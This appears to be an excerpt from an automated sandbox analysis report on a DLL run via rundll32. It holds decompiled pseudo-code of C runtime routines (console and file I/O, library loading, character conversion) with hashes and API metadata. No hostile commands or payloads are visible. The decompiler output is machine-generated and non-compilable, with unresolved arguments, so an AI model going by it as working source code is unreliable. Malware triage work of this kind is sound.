                                				E00007FFC7FFC130EE6A0(_t220);
                                				 *_t220 = 0x16;
                                				goto 0x130f5ca9;
                                				if (r12d == 0) goto 0x130f5c93;
                                				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x130f5c93;
                                				_t186 = __rdx;
                                				if (_t186 == 0) goto 0x130f58fa;
                                				r10d =  *((char*)(_t220 + _t274 + 0x39));
                                				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
                                				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
                                				if (_t186 == 0) goto 0x130f596c;
                                				if (_t186 != 0) goto 0x130f5961;
                                				if ((r8b &  !r12d) == 0) goto 0x130f5976;
                                				r14d = r12d;
                                				goto 0x130f5a0c;
                                				if ((r8b &  !r12d) != 0) goto 0x130f5992;
                                				E00007FFC7FFC130EE680(_t220);
                                				 *_t220 = 0;
                                				_t118 = E00007FFC7FFC130EE6A0(_t220);
                                				 *_t220 = 0x16;
                                				E00007FFC7FFC130EE580(_t118);
                                				goto 0x130f5b18;
                                				r14d = r12d;
                                				r14d = r14d >> 1;
                                				r14d =  <  ? 4 : r14d;
                                				E00007FFC7FFC130EE154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                				_t241 = _t220;
                                				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                                				_t301 = _t241;
                                				if (_t241 != 0) goto 0x130f59db;
                                				E00007FFC7FFC130EE6A0(_t220);
                                				 *_t220 = 0xc;
                                				E00007FFC7FFC130EE680(_t220);
                                				 *_t220 = 8;
                                				goto 0x130f5b18;
                                				_t26 = _t255 + 1; // 0x1
                                				r8d = _t26;
                                				E00007FFC7FFC130F5D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
                                				_t256 =  *(_t277 + 0x40);
                                				r10b =  *((intOrPtr*)(_t277 + 0xa0));
                                				r8d = 1;
                                				 *((long long*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
                                				_t221 =  *((intOrPtr*)(0x13124970 + _t256 * 8));
                                				 *((long long*)(_t277 + 0x50)) = _t301;
                                				r9d = 0xa;
                                				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x130f5aa1;
                                				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
                                				if (_t154 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t301 = _t154;
                                				r14d = r14d - 1;
                                				_t302 = _t301 + _t279;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
                                				if (r10b == 0) goto 0x130f5aa1;
                                				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b));
                                				if (_t155 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t302 = _t155;
                                				_t303 = _t302 + _t279;
                                				r14d = r14d - 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
                                				if (r10b != r8b) goto 0x130f5aa1;
                                				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c));
                                				if (_t156 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t303 = _t156;
                                				r14d = r14d - 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
                                				if (E00007FFC7FFC130F3EE4(r13d, 0,  *((intOrPtr*)(0x13124970 + _t256 * 8))) == 0) goto 0x130f5b36;
                                				_t228 =  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8));
                                				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b36;
                                				if (GetConsoleMode(_t299) == 0) goto 0x130f5b36;
                                				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x130f5b3b;
                                				r14d = r14d >> 1;
                                				r8d = r14d;
                                				 *(_t277 + 0x20) = _t270;
                                				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x130f5b2a;
                                				E00007FFC7FFC130EE630(GetLastError(),  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
                                				E00007FFC7FFC130EE114( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
                                				goto 0x130f5cb1;
                                				goto 0x130f5b76;
                                				 *((intOrPtr*)(_t277 + 0x48)) = sil;
                                				r8d = r14d;
                                				 *(_t277 + 0x20) = _t270;
                                				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x130f5c5d;
                                				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x130f5c5d;
                                				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b1b;
                                				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x130f5bbf;
                                				_t261 = _t303 + _t279;
                                				 *(_t277 + 0x20) = _t292 >> 1;
                                				_t135 = E00007FFC7FFC130F5564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
                                				goto 0x130f5b1b;
                                				if (_t135 == 0) goto 0x130f5c45;
                                				_t281 =  *((intOrPtr*)(_t277 + 0x50));
                                				_t250 = _t281;
                                				_t264 = _t281;
                                				_t288 =  &(_t281[_t135 >> 1]);
                                				if (_t281 - _t288 >= 0) goto 0x130f5c38;
                                				_t235 =  &(_t281[1]);
                                				r9d =  *_t250 & 0x0000ffff;
                                				if (r9w == 0x1a) goto 0x130f5c2f;
                                				if (r9w != 0xd) goto 0x130f5c18;
                                				if (_t235 - _t288 >= 0) goto 0x130f5c18;
                                				if ( *_t235 != 0xa) goto 0x130f5c18;
                                				 *_t264 = 0xa;
                                				goto 0x130f5c28;
                                				_t264[1] = r9w;
                                				if ( &(_t250[3]) - _t288 < 0) goto 0x130f5beb;
                                				goto 0x130f5c38;
                                				_t238 =  *((intOrPtr*)(0x13124970 + _t261 * 8));
                                				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
                                				goto 0x130f5b1b;
                                				E00007FFC7FFC130F5334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
                                				goto 0x130f5bb8;
                                				if (GetLastError() != 5) goto 0x130f5c83;
                                				E00007FFC7FFC130EE6A0(_t238);
                                				 *_t238 = 9;
                                				_t139 = E00007FFC7FFC130EE680(_t238);
                                				 *_t238 = 5;
                                				goto 0x130f5b18;
                                				if (_t139 != 0x6d) goto 0x130f5b11;
                                				goto 0x130f5b1b;
                                				goto 0x130f5cb1;
                                				E00007FFC7FFC130EE680(_t238);
                                				 *_t238 = 0xa;
                                				_t142 = E00007FFC7FFC130EE6A0(_t238);
                                				 *_t238 = 9;
                                				return E00007FFC7FFC130EE580(_t142) | 0xffffffff;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction ID: d87aa89be38254d429dec8f1926e9f76cc9980d3ac39fc49bde44a9cb0598bb5
                                • Opcode Fuzzy Hash: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction Fuzzy Hash: 23C1F422A1CEAEC7EA648F10994027D6BD9BB80BE8F550174DA4E233D5CF3DD865C360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction ID: af41ad1a353df793f28d0ed632af6f6e6ff1c393578a34c4022ff524bf2c32b2
                                • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction Fuzzy Hash: 0AF0C862B19F5696FF449B15F48027963A0EF8C7A8F541435D90F22664DF3CD494D320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E00007FFC7FFC130F4AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                                				char _v64;
                                				signed long long _v72;
                                				intOrPtr _v84;
                                				unsigned int _v88;
                                				intOrPtr _v96;
                                				long long _v100;
                                				signed int _v104;
                                				signed int _v120;
                                				void* __rbp;
                                				void* _t75;
                                				long _t94;
                                				unsigned int _t95;
                                				intOrPtr _t103;
                                				signed int _t124;
                                				intOrPtr _t158;
                                				unsigned long long _t164;
                                				signed int* _t166;
                                				intOrPtr _t169;
                                				unsigned int _t182;
                                				signed short* _t183;
                                				void* _t185;
                                				signed long long _t194;
                                				void* _t195;
                                				signed long long _t197;
                                				signed long long _t198;
                                				signed long long _t200;
                                				void* _t201;
                                				signed short* _t202;
                                
                                				_t192 = __r9;
                                				_t179 = __rdx;
                                				_t167 = __rbx;
                                				_a32 = __rbx;
                                				r15d = r8d;
                                				_t194 = __ecx;
                                				_t183 = __rdx;
                                				if (r8d != 0) goto 0x130f4b26;
                                				goto 0x130f4dc1;
                                				if (__rdx != 0) goto 0x130f4b4a;
                                				E00007FFC7FFC130EE680(__rax);
                                				 *__rax = 0;
                                				_t75 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t75);
                                				goto 0x130f4dc1;
                                				r14d = r14d & 0x0000003f;
                                				_t197 = _t194 >> 6;
                                				_t200 = _t194 << 6;
                                				_v72 = _t197;
                                				_t169 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
                                				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
                                				if (__rbx - 1 - 1 > 0) goto 0x130f4b80;
                                				if (( !r15d & 0x00000001) == 0) goto 0x130f4b2b;
                                				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x130f4b96;
                                				_t14 = _t179 + 2; // 0x2
                                				r8d = _t14;
                                				E00007FFC7FFC130F5D68(0x13124970, _t169, __rdx);
                                				_v88 = _t182;
                                				if (E00007FFC7FFC130F3EE4(r12d, 0, 0x13124970) == 0) goto 0x130f4cab;
                                				_t158 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
                                				if (( *(0x13124970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4cab;
                                				E00007FFC7FFC130EF0D4(_t158, __rbx, _t169, _t179, __r9);
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x130f4bec;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x130f4cab;
                                				if (GetConsoleMode(??, ??) == 0) goto 0x130f4cab;
                                				if (_t103 == 0) goto 0x130f4c8d;
                                				if (_t103 - 1 - 1 > 0) goto 0x130f4d48;
                                				_v104 = _v104 & 0;
                                				_t195 = _t183 + _t201;
                                				_t202 = _t183;
                                				_v100 = 0;
                                				if (_t183 - _t195 >= 0) goto 0x130f4d3e;
                                				r13d =  *_t202 & 0x0000ffff;
                                				if (E00007FFC7FFC130F633C(r13w & 0xffffffff) != r13w) goto 0x130f4c7b;
                                				_v100 = 2;
                                				if (r13w != 0xa) goto 0x130f4c70;
                                				r13d = 0xd;
                                				if (E00007FFC7FFC130F633C(r13d) != r13w) goto 0x130f4c7b;
                                				_v100 = 2;
                                				if ( &(_t202[1]) - _t195 >= 0) goto 0x130f4c84;
                                				goto 0x130f4c35;
                                				_v104 = GetLastError();
                                				_t198 = _v72;
                                				goto 0x130f4d3e;
                                				r9d = r15d;
                                				E00007FFC7FFC130F446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
                                				asm("movsd xmm0, [eax]");
                                				_t124 =  *0x7FFC13124978;
                                				goto 0x130f4d43;
                                				if (( *( *((intOrPtr*)(0x13124970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4d0b;
                                				if (3 == 0) goto 0x130f4cf7;
                                				if (3 == 0) goto 0x130f4ce3;
                                				if (2 != 1) goto 0x130f4d48;
                                				r9d = r15d;
                                				E00007FFC7FFC130F477C(3, r12d, 0x13124970, _t167,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				r9d = r15d;
                                				E00007FFC7FFC130F4898(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				r9d = r15d;
                                				E00007FFC7FFC130F4674(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				_v104 = _v104 & _t124;
                                				_v120 = _v120 & 0x13124970;
                                				r8d = r15d;
                                				_v100 = 0x13124970;
                                				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x130f4d3b;
                                				_t94 = GetLastError();
                                				_v104 = _t94;
                                				asm("movsd xmm0, [ebp-0x30]");
                                				asm("movsd [ebp-0x20], xmm0");
                                				_t164 = _v88 >> 0x20;
                                				if (_t94 != 0) goto 0x130f4dbc;
                                				_t95 = _v88;
                                				if (_t95 == 0) goto 0x130f4d88;
                                				if (_t95 != 5) goto 0x130f4d7b;
                                				E00007FFC7FFC130EE6A0(_t164);
                                				 *_t164 = 9;
                                				E00007FFC7FFC130EE680(_t164);
                                				 *_t164 = 5;
                                				goto 0x130f4b42;
                                				E00007FFC7FFC130EE630(_v88, _t164, _t167);
                                				goto 0x130f4b42;
                                				_t166 =  *((intOrPtr*)(0x13124970 + _t198 * 8));
                                				if (( *(0x13124970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x130f4da4;
                                				if ( *_t183 == 0x1a) goto 0x130f4b1f;
                                				E00007FFC7FFC130EE6A0(_t166);
                                				 *0x13124970 = 0x1c;
                                				E00007FFC7FFC130EE680(_t166);
                                				 *_t166 =  *_t166 & 0x00000000;
                                				goto 0x130f4b42;
                                				return _v84 - _v96;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction ID: 8198741ddaf4f9c2ed38ab7a1c700d2cf715dc8ed07617c4b25deb922127e75a
                                • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction Fuzzy Hash: A481BF22B18E2A86FB509F6599406BD26E8BF44BACF424175CE0E337D5DF3CA461C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E00007FFC7FFC130F446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                                				signed long long _v72;
                                				char _v80;
                                				intOrPtr _v87;
                                				char _v88;
                                				long long _v96;
                                				long long _v104;
                                				int _v108;
                                				intOrPtr _v112;
                                				short _v116;
                                				char _v120;
                                				signed long long _v128;
                                				signed long long _v136;
                                				intOrPtr _v144;
                                				signed int _v152;
                                				int _t80;
                                				long _t85;
                                				signed char _t86;
                                				signed long long _t116;
                                				intOrPtr _t120;
                                				long* _t125;
                                				signed long long _t127;
                                				intOrPtr _t136;
                                				signed long long _t140;
                                				void* _t143;
                                				signed long long _t146;
                                				void* _t148;
                                				void* _t156;
                                				void* _t157;
                                				signed long long _t161;
                                
                                				_t127 = __rcx;
                                				_a8 = __rbx;
                                				_t116 =  *0x13123760; // 0xb74f7d657c87
                                				_v72 = _t116 ^ _t148 - 0x00000080;
                                				r12d = r9d;
                                				_t161 = __edx >> 6;
                                				_t146 = __edx << 6;
                                				_v96 = __r8;
                                				_t125 = __rcx;
                                				_t157 = _t156 + __r8;
                                				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x28));
                                				_v104 = 0x13124970;
                                				_v108 = GetConsoleCP();
                                				 *__rcx = __rdx;
                                				 *((intOrPtr*)(__rcx + 8)) = 0;
                                				if (__r8 - _t157 >= 0) goto 0x130f464a;
                                				r13b =  *((intOrPtr*)(__r8));
                                				_v120 = 0;
                                				_t136 =  *((intOrPtr*)(0x13124970 + _t161 * 8));
                                				_t86 =  *(_t136 + _t146 + 0x3d);
                                				if ((_t86 & 0x00000004) == 0) goto 0x130f451f;
                                				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
                                				r8d = 2;
                                				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
                                				_v87 = r13b;
                                				goto 0x130f4564;
                                				E00007FFC7FFC130F1740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
                                				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x130f455b;
                                				if (__r8 - _t157 >= 0) goto 0x130f462a;
                                				r8d = 2;
                                				if (E00007FFC7FFC130F1654( &_v120, __r8) == 0xffffffff) goto 0x130f464a;
                                				_t143 = __r8 + 1;
                                				goto 0x130f4576;
                                				r8d = 1;
                                				if (E00007FFC7FFC130F1654( &_v120, _t143) == 0xffffffff) goto 0x130f464a;
                                				_v128 = _v128 & 0x00000000;
                                				_v136 = _v136 & 0x00000000;
                                				r9d = 1;
                                				_v144 = 5;
                                				_v152 =  &_v80;
                                				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                				r14d = _t80;
                                				if (_t80 == 0) goto 0x130f464a;
                                				_v152 = _v152 & 0x00000000;
                                				_t140 =  &_v80;
                                				r8d = _t80;
                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
                                				_t125[1] = _t125[2] - _v96 + __edi;
                                				if (_v112 - r14d < 0) goto 0x130f464a;
                                				if (r13b != 0xa) goto 0x130f4622;
                                				_t50 = _t140 + 0xd; // 0xd
                                				_v152 = _t140;
                                				_t52 = _t140 + 1; // 0x1
                                				r8d = _t52;
                                				_v116 = _t50;
                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
                                				if (_v112 - 1 < 0) goto 0x130f464a;
                                				_t125[2] = _t125[2] + 1;
                                				_t125[1] = _t125[1] + 1;
                                				goto 0x130f44e0;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
                                				 *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
                                				_t125[1] = _t125[1] + 1;
                                				goto 0x130f464a;
                                				_t85 = GetLastError();
                                				 *_t125 = _t85;
                                				E00007FFC7FFC130F6D80();
                                				return _t85;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                • String ID:
                                • API String ID: 3659116390-0
                                • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction ID: 9de9824038147a5cd8e5a518f35adca10164798dc89546b3ec1ab7c393af6ecd
                                • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction Fuzzy Hash: 7B51D232A18A658AFB10CF25E9443AD37B4FB48BACF148135CE0A67798DF38D165C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 36%
                                			E00007FFC7FFC130EF320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                				signed long long _t72;
                                				signed long long _t76;
                                				intOrPtr _t78;
                                				signed long long _t80;
                                				signed long long _t89;
                                				struct HINSTANCE__* _t94;
                                				signed long long _t95;
                                				long long _t101;
                                				void* _t105;
                                				signed long long _t109;
                                				signed long long _t111;
                                				signed long long _t114;
                                				struct HINSTANCE__* _t115;
                                				long _t118;
                                				void* _t121;
                                				WCHAR* _t123;
                                
                                				 *((long long*)(_t105 + 8)) = __rbx;
                                				 *((long long*)(_t105 + 0x10)) = _t101;
                                				 *((long long*)(_t105 + 0x18)) = __rsi;
                                				r14d = __ecx;
                                				_t111 =  *0x13123760; // 0xb74f7d657c87
                                				_t95 = _t94 | 0xffffffff;
                                				_t89 = _t111 ^  *(0x7ffc130e0000 + 0x44810 + _t121 * 8);
                                				asm("dec eax");
                                				if (_t89 == _t95) goto 0x130ef4a1;
                                				if (_t89 == 0) goto 0x130ef389;
                                				_t72 = _t89;
                                				goto 0x130ef4a3;
                                				if (__r8 == __r9) goto 0x130ef435;
                                				_t78 =  *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8));
                                				if (_t78 == 0) goto 0x130ef3a9;
                                				if (_t78 == _t95) goto 0x130ef421;
                                				goto 0x130ef41c;
                                				r8d = 0x800;
                                				LoadLibraryExW(_t123, _t121, _t118);
                                				if (_t72 != 0) goto 0x130ef3ea;
                                				if (GetLastError() != 0x57) goto 0x130ef3e8;
                                				r8d = 0;
                                				LoadLibraryExW(??, ??, ??);
                                				_t80 = _t72;
                                				goto 0x130ef3ea;
                                				if (_t80 != 0) goto 0x130ef403;
                                				 *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8)) = _t95;
                                				goto 0x130ef421;
                                				_t19 = 0x7ffc130e0000 + 0x44770 + __rsi * 8;
                                				_t76 =  *_t19;
                                				 *_t19 = _t80;
                                				if (_t76 == 0) goto 0x130ef41c;
                                				FreeLibrary(_t115);
                                				if (_t80 != 0) goto 0x130ef476;
                                				if (__r8 + 4 != __r9) goto 0x130ef392;
                                				if (_t80 == 0) goto 0x130ef486;
                                				GetProcAddress(_t94);
                                				if (_t76 == 0) goto 0x130ef47f;
                                				_t109 =  *0x13123760; // 0xb74f7d657c87
                                				asm("dec eax");
                                				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
                                				goto 0x130ef4a3;
                                				goto 0x130ef437;
                                				_t114 =  *0x13123760; // 0xb74f7d657c87
                                				asm("dec eax");
                                				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
                                				return 0;
                                			}

                                APIs
                                • GetProcAddress.KERNEL32(?,0000B74F7D657C87,00000006,00007FFC130EF647,?,?,00000000,00007FFC130EF1C7,?,?,0000B74F7D657C87,00007FFC130EE6A9), ref: 00007FFC130EF442
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID:
                                • API String ID: 190572456-0
                                • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction ID: b3c1aa9b45117998430089d8621a0ccc55ad2349ced2e3cb28d30a168b23aa20
                                • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction Fuzzy Hash: CE4128A2B0EE6981FE118B52A80027523D1BF04BF8F1A4939DD1D5B7C4EF3CE015C214
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 32%
                                			E00007FFC7FFC130F4EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                				intOrPtr _v32;
                                				long long _v40;
                                				void* _t11;
                                				long long _t49;
                                
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a24 = __rsi;
                                				if (__rcx != 0) goto 0x130f4f28;
                                				_t11 = E00007FFC7FFC130EE6A0(__rax);
                                				 *((intOrPtr*)(__rax)) = 0x16;
                                				E00007FFC7FFC130EE580(_t11);
                                				goto 0x130f4fc9;
                                				if (__rdx == 0) goto 0x130f4f11;
                                				E00007FFC7FFC130EF4C0();
                                				_v32 = 0;
                                				r15d = 0;
                                				 *__rdx = _t49;
                                				r15b = 0 == 0;
                                				_v40 = _t49;
                                				r9d = r9d | 0xffffffff;
                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4f6f;
                                				E00007FFC7FFC130EE630(GetLastError(), __rax, __rbx);
                                				goto 0x130f4f21;
                                				E00007FFC7FFC130EE154(__rax, _t14 + _t14);
                                				if (__rax == 0) goto 0x130f4fbf;
                                				_v32 = r14d;
                                				r9d = r9d | 0xffffffff;
                                				_v40 = __rax;
                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4fb1;
                                				E00007FFC7FFC130EE630(GetLastError(), __rax, __rax);
                                				goto 0x130f4fbf;
                                				 *__rdx = __rax;
                                				E00007FFC7FFC130EE114(__rax, _t49);
                                				return 1;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
